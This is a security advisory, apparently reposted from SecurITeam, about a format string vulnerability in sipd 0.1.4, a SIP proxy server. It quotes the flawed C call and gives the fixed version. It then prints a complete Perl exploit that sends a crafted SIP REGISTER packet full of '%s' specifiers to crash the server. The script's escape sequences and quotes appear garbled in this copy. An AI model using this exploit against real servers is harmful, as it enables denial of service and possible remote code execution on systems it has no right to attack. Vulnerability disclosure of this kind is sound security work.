‘sipD Format String Vulnerability’

Summary

sipd is ‘a high performance, scalable SIP (Session Initiation Protocol) proxy and location server written in C’. A format string vulnerability in the product allows remote attackers to cause the server to execute arbitrary code by providing it with a specially crafted SIP request.’

Credit:

‘SecurITeam would like to thank STORM for finding this vulnerability. ‘


Details

Vulnerable systems:
 * sipd version 0.1.4

Immune systems:
 * sipd version 0.1.5

Vulnerable code:
In strans/strans.c, line:
static inline u8_t *strans_hash_key_compat(const msg_t *req, bool_t cancel)

The program incorrectly calls sapi_saprintf without any parameters:
    /* Request URI */
    tmp = msg_url_str(req->request->url);
    sapi_saprintf(&hkey, tmp);
    sapi_free(tmp);

This means that a URI that includes format strings can cause the remote server to execute arbitrary code due to insufficient formatting being passed to the printf() function.

Solution:
Upgrade to version 0.1.5, which is available at: http://www.sxdesign.com/index.php?page=developer&submnu=sipd.

Exploit:
#!/usr/bin/perl

# SIPd – SIP Password Format String
# Kills sipd version 0.1.4 and prior

use IO::Socket;
use strict;

unless (@ARGV == 2) { die ‘usage: $0 host your_ip [port]’ }

my $remote_host = shift(@ARGV);
my $your_host = shift(@ARGV);
my $port = shift(@ARGV);
if ($port eq ”)
{
 $port = ‘5060’;
}

my $buf = ‘REGISTER sip::%s%s%s%s%s%s%s%s%s%s%s%s%s%s@$remote_host SIP/2.0r
Via: SIP/2.0/UDP $your_host:3277r
From: ‘STORM’ <sip:$your_host:3277>r
To: <sip:$your_host:3277>r
Call-ID: 12312312@$your_hostr
CSeq: 1 OPTIONSr
Max-Forwards: 70r
rn’;

my $socket = IO::Socket::INET->new(Proto => ‘udp’) or die ‘Socket error: $@n’;
my $ipaddr = inet_aton($remote_host) || $remote_host;
my $portaddr = sockaddr_in($port, $ipaddr);

send($socket, $buf, 0, $portaddr) == length($buf) or die ‘Can’t send: $!n’;

print ‘Now, ‘$remote_host’ must be dead :)n’;’

Categories: UNIX